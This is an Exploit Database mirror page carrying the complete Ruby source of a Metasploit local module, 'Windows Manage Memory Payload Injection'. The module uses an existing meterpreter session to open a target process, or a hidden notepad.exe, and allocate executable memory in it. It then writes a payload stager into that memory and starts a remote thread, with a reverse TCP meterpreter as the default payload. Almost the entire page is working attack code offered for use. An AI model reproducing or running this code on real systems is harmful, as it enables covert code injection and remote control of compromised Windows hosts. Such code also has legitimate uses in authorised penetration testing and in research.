Microsoft Windows – Manage Memory Payload Injection (Metasploit)

• Exploit Database
• 154 阅读

• 作者： Metasploit
  日期： 2013-01-25
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/24366/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177

  ## # ## This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ##   require &apos;msf/core&apos; require &apos;rex&apos; require &apos;msf/core/exploit/exe&apos;   class Metasploit3 < Msf::Exploit::Local Rank = ExcellentRanking   def initialize(info={}) super( update_info( info, &apos;Name&apos;=> &apos;Windows Manage Memory Payload Injection&apos;, &apos;Description&apos; => %q{ This module will inject a payload into memory of a process.If a payload isn&apos;t selected, then it&apos;ll default to a reverse x86 TCP meterpreter.If the PID datastore option isn&apos;t specified, then it&apos;ll inject into notepad.exe instead. }, &apos;License&apos; => MSF_LICENSE, &apos;Author&apos;=> [ &apos;Carlos Perez <carlos_perez[at]darkoperator.com>&apos;, &apos;sinn3r&apos; ], &apos;Platform&apos;=> [ &apos;win&apos; ], &apos;SessionTypes&apos;=> [ &apos;meterpreter&apos; ], &apos;Targets&apos; => [ [ &apos;Windows&apos;, {} ] ], &apos;DefaultTarget&apos; => 0, &apos;DisclosureDate&apos;=> "Oct 12 2011" ))   register_options( [ OptInt.new(&apos;PID&apos;, [false, &apos;Process Identifier to inject of process to inject payload.&apos;]), OptBool.new(&apos;NEWPROCESS&apos;, [false, &apos;New notepad.exe to inject to&apos;, false]) ], self.class) end   # Run Method for when run command is issued def exploit @payload_name = datastore[&apos;PAYLOAD&apos;] @payload_arch = framework.payloads.create(@payload_name).arch   # syinfo is only on meterpreter sessions print_status("Running module against #{sysinfo[&apos;Computer&apos;]}") if not sysinfo.nil?   pid = get_pid if not pid print_error("Unable to get a proper PID") return end   if @payload_arch.first =~ /64/ and client.platform =~ /x86/ print_error("You are trying to inject to a x64 process from a x86 version of Meterpreter.") print_error("Migrate to an x64 process and try again.") return false else inject_into_pid(pid) end end   # Figures out which PID to inject to def get_pid pid = datastore[&apos;PID&apos;] if pid == 0 or datastore[&apos;NEWPROCESS&apos;] or not has_pid?(pid) print_status("Launching notepad.exe...") pid = create_temp_proc end   return pid end     # Determines if a PID actually exists def has_pid?(pid) procs = [] begin procs = client.sys.process.processes rescue Rex::Post::Meterpreter::RequestError print_error("Unable to enumerate processes") return false end   pids = []   procs.each do |p| found_pid = p[&apos;pid&apos;] return true if found_pid == pid end   print_error("PID #{pid.to_s} does not actually exist.")   return false end   # Checks the Architeture of a Payload and PID are compatible # Returns true if they are false if they are not def arch_check(pid) # get the pid arch client.sys.process.processes.each do |p| # Check Payload Arch if pid == p["pid"] vprint_status("Process found checking Architecture") if @payload_arch.first == p[&apos;arch&apos;] vprint_good("Process is the same architecture as the payload") return true else print_error("The PID #{ p[&apos;arch&apos;]} and Payload #{@payload_arch.first} architectures are different.") return false end end end end   # Creates a temp notepad.exe to inject payload in to given the payload # Returns process PID def create_temp_proc() windir = client.fs.file.expand_path("%windir%") # Select path of executable to run depending the architecture if @payload_arch.first== "x86" and client.platform =~ /x86/ cmd = "#{windir}\\System32\\notepad.exe" elsif @payload_arch.first == "x86_64" and client.platform =~ /x64/ cmd = "#{windir}\\System32\\notepad.exe" elsif @payload_arch.first == "x86_64" and client.platform =~ /x86/ cmd = "#{windir}\\Sysnative\\notepad.exe" elsif @payload_arch.first == "x86" and client.platform =~ /x64/ cmd = "#{windir}\\SysWOW64\\notepad.exe" end   begin proc = client.sys.process.execute(cmd, nil, {&apos;Hidden&apos; => true }) rescue Rex::Post::Meterpreter::RequestError return nil end   return proc.pid end   def inject_into_pid(pid) vprint_status("Performing Architecture Check") return if not arch_check(pid)   begin print_status("Preparing &apos;#{@payload_name}&apos; for PID #{pid}") raw = payload.generate   print_status("Opening process #{pid.to_s}") host_process = client.sys.process.open(pid.to_i, PROCESS_ALL_ACCESS) if not host_process print_error("Unable to open #{pid.to_s}") return end   print_status("Allocating memory in procees #{pid}") mem = host_process.memory.allocate(raw.length + (raw.length % 1024))   # Ensure memory is set for execution host_process.memory.protect(mem)   print_status("Allocated memory at address #{"0x%.8x" % mem}, for #{raw.length} byte stager") print_status("Writing the stager into memory...") host_process.memory.write(mem, raw) host_process.thread.create(mem, 0) print_good("Successfully injected payload in to process: #{pid}")   rescue Rex::Post::Meterpreter::RequestError => e print_error("Unable to inject payload:") print_line(e.to_s) end end   end